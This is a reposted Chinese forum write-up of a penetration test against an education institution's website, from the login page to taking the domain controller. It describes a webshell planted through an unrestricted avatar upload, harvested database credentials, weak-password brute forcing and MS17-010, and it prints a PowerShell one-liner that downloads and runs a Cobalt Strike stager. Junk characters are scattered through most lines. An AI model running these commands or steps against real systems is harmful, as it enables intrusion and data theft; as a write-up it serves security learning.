|
- a, K; F1 K6 K1 i+ ^+ i
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路6 ]1 x& R9 A& ?
. E$ b; l n% ~0 G
9 G' Z {: l, N1 s" e; K$ D2 C
3 Y" M! S' g! r3 L0 H: w2 h
O8 a. i$ V3 g& | Q7 X
0 U" j. U) o3 J+ c 正文" ]; `8 g+ ^ R& Y6 I
! D& N A/ I1 s: M+ E) D6 j' K" u3 }6 T* v5 c! R; }
6 H4 q) J( N' X$ G D" D % Q/ k! [3 {- ], ?9 d8 j& H" n
. R% x0 ]/ K- Y2 a 目标:www.xxxx.com(一家教育机构)
* ]! @7 O; h$ j$ N, H' |打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能0 ?7 U6 G- G: M7 {8 {2 S; y
0 g1 L# c1 V' Z/ _
: B9 r* L4 O3 d  3 j a1 R# a+ |+ U
4 d0 e Z. o6 L0 `. w+ T7 K% c
# t: x7 a4 D5 w& Z& A% `! z 进行了简单的信息搜集
. P8 `% ?$ p3 y3 u
' @4 [6 U* c2 b2 \) o
) Y, l- \4 l2 r 3 d: ^2 U$ z, h6 X
! W* c) F$ Y0 @( w) ~
子域名搜集0 h$ p3 C' S& X. ?
+ M/ p( f; H% @3 ]9 P5 y0 r- `' V
% J! X. x& d/ Z) ~/ @
 % I/ Z! p, T( w2 j+ ~4 p, c$ D
$ p4 h: W. ^' w9 r5 ~ N9 a" E" n5 a7 J- e+ ^
fofa找资产
3 n& C5 C( O- ^4 D* [4 K' i7 t2 U
4 v3 ]( [5 G! ]0 m9 n, F4 v" p, m$ I3 j9 d9 t( f8 g
5 v6 z* I' W" K/ B' X, }( U
" t; U' g5 N- ^( Z) H  $ V& R! k$ ~6 p- q; q
1 J$ S" g" z2 C( U# G
, X5 n( v1 U# A# C0 [2 k5 l
一共七个资产。去重之后只有两个。
! i* l4 }0 f0 |& i0 }8 t& _
( ~5 x8 p4 D- a) T/ T3 Q' M2 A5 N: l/ ?6 m: |4 k
( |0 O3 R) s- n1 {, Z
5 L) W& @2 |$ s9 ^
目录探测
; @) R2 E9 C) |0 u( m
2 K& A9 ~. k; p
+ H$ X, L+ M% l) |5 m3 l+ c  & t( R" a! S$ b
# G' Y4 H: t0 z+ l3 ^( O; P$ Q2 _6 I c' D; {' }9 ]# U, l" r
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
, ^+ Q6 ^2 y0 b+ T" _ e, c- F
4 |: `, c2 s) B/ J! g
: `& d' [1 S% U6 l1 \
) A! C& r3 @2 m. W# L
/ [% U8 {& G7 b8 H4 H 我又尝试了通过修改返回包来绕过登录界面! `: G1 g4 _0 q
% a5 _2 C4 V- E Y5 Z9 P
1 b1 v- L( h& f# [7 R7 @# i) x  % X- r6 S ^6 M
$ {% ^3 l z0 D4 L# a) P8 O- r
' ~8 A# A2 U8 ]
还是不行,尝试注入无果
6 R$ r/ \. n- m1 e
6 E. m' K' n. _ S9 q; ^. H1 E! x# w$ m6 D
 0 E4 Q% e( w6 G v+ z5 o% @
. L- n3 i( A6 v5 i
m: }. ` x4 ?. i! N7 m 不过我目录探测出了一处Spring信息泄露
$ X% `$ D5 C" ]6 y' b* @+ d
1 r% k5 D9 j# S% Q' D7 G, S
. w3 f# ^) I# }3 ^6 G5 S) K( R: v* r* f
! L0 N, c2 b' K% ^: k
3 q6 \) {6 P, S* g 
; u, p( c0 {# A, B2 K
& j w; A9 m% c2 U
1 k; k- U/ F, ]9 \. @+ @8 M 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
' [5 Y% |9 ^+ m \- C0 R: V
: P) [+ k) ~% s8 v: E
- e" h7 a2 k) ?. J4 |! p 
6 [- {/ v+ c: d' x- z, C
6 p% X' z S* h; C/ A1 \6 D; Z1 V x7 P+ w- p1 I( G5 L8 O9 t% f
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。9 x* F$ W4 K4 R
+ D, |$ \4 `. R8 y+ a
/ P& ^* N @6 h  8 z: [4 s4 ~& O9 s) e: q& n8 c% v
% T4 {1 D% `7 f; i* d: i. [& j8 F0 h: c7 f! l
获取有些师傅到这一步就手机抓包电脑测了。
. @- m& S% H6 G2 h. ^ R- J ( C4 R v* K: q7 p" F/ F
$ N6 M# w8 ^7 ~! h% ]4 W' {2 E Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。; n0 g& M+ A6 ~; K
3 @/ ]( l5 @% `7 [7 }
3 B' q. g/ @0 b7 `7 W+ `. n: P: W 其中在一个公众号发现了小程序,可以进行注册。
5 Q% K+ A; p4 O& U ( \$ _2 l( K' X8 n' L
4 O: ~2 G! a. K0 f" M1 j
看到了头像上传,尝试上传获取WebShell/ r1 v% s) G7 C L& n8 R" X
/ m& N. e$ h. K3 _" _4 n' ]# f
) \# T; f5 e! c* y- e, K0 K 
- D+ B- u7 d d: @8 M( s! F7 K 2 k8 f3 b& s$ j% w( J, v
! F+ y" A* ?: I4 U5 @' F4 H 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
$ A9 w" x2 I" _3 R
6 [- c, ~9 ~( ~
5 C' J) |0 ]) O3 O, @ v 
( }$ K* s# P3 X% ^ L Q1 }0 n9 {/ e. v
! F0 O- R4 V8 A9 y
然后上了大马% X. z; H* f! v5 P. R1 l
! E6 o( h6 @. ^# U9 e' r
5 ^5 |, O4 D# p" T! f2 n8 ^6 Y 
) U2 @) Z2 t6 d0 X: t$ L
6 S; C9 P' [# f& I( o
& C( I; E0 F9 A2 A! F  & f% R$ ]: W D+ H: f
1 t6 O7 ]3 H O- P4 z1 ^3 q. h0 L
. g' ]- c; Y" j 通过翻找文件发现数据库账号密码 i t( [5 o1 h4 H7 d* g/ }& j# S6 g
c9 I/ {7 Y! r
. r2 A" U1 A, t8 _1 P
v7 _1 C, h2 @* O: O6 w s, q
* r$ y% c. c9 c& v2 c! D+ ]5 s
- m( q7 Z4 {' c; f9 z --内网渗透! V( n$ {1 i$ {
6 Q N+ w1 _! U8 `
% M- t! }4 Z) x' @; b
直接通过powershell执行 cs上线/ {. w. ^4 ^, {/ r! _( v; {
4 g$ P- s) `8 _! L
$ f- c* i; ^( p E) Q: k Z4 z D powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
5 _0 G$ `" o* {3 A) y 6 l& X( { ~7 \9 t
2 C' Y* g5 n: v9 W. r) y, C/ `6 f
& {9 g5 E$ a! W( m& o: f$ | 6 Q5 j( {3 G2 H4 _9 E
4 v: o0 r( l$ y4 w1 U5 Y6 G* ?- c
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
# p* [$ p( V" i
3 u& p: X$ f/ U5 ?4 v4 o6 k# Y! a' X0 ? t9 g3 v( |
 8 i$ X, @* ?4 `( _1 a( `
& I; V' [2 ~. t4 F7 [* ^" g
- e( M8 S! _- U% R/ g+ ? 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% }& \' S# S9 t$ t( L
) [& f0 S* q2 B
/ {5 f3 d$ X& t$ i/ c
$ h/ y/ D9 B; W4 y1 B+ @ 5 ^# k r, c% E. c8 a
6 n7 `: i* w" ~0 w% O; @" w& a$ B
R, d$ _. z7 h
5 u# C5 i& D" U- ?# r- Y7 S
! s1 `5 `$ D: K2 L 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
$ N0 Y6 m( T& o9 N& O
! x0 O j9 g {2 U' y9 P9 P# h
9 R! H; c `' i, l " e0 R1 i) f- a4 ^) |* L. `- i
0 d% F: B4 {( j5 h. W4 X  + a& I) u' R6 B n- y8 I
3 y/ Z% ?% A3 w: o/ N, r1 f" [" b2 Y
) I0 E: [$ U6 o" }1 V3 O
+ W( _4 d# }' n) _# M6 j
" P8 r: N' G' ?8 s+ P
# F+ w% Q s6 V" ]" T
g5 n1 G: S* {7 P, R , V9 y2 e8 W# J5 b4 Q+ |5 Z2 x
4 l p* C6 v! D6 c q% C: C
& M. y- |6 ^# M. }- q 小结5 e, j3 p6 \) r( r# F" }) f
1 p" f k. K8 J$ b2 T/ t' S
: q% \! c8 q9 Y
; j7 |/ Q0 E( B8 p: @1 x0 D
1 q& j" ^: H ~, E- k- g7 t; H1 ]4 [# R+ ]6 o% s E
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
9 b0 f7 T5 ^3 h
- L# T' `3 x2 C
* u, G$ j+ R% A6 H
% [; E+ c: T' h1 u8 i6 [+ }* |
+ |$ e4 o; P; K# b" G1 E! y/ F3 Z& Z4 L$ a
- ) d1 G9 I+ \) ]% H
7 S) b4 t G$ s+ [: B; Z# [
9 h' }+ B, `; x) }) p, ~
-
% ^- W6 [; u0 U& |: n
6 T4 p. V. L! i6 k9 {. S8 i
) D. s* M( [+ g9 g; O. s3 M9 r
- C) k' ]/ p3 u7 L- x$ N: I2 }% u, x& K0 e9 R* H' z
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 c, J, l: J4 `: P$ f6 ?
0 b5 Y0 h: h/ D5 Y% s8 }/ y8 W; L: n6 r: V
( o/ g# f& Z* Y# B$ g' F7 C | 
发表于 2024-3-1 19:41:32
收藏
支持
反对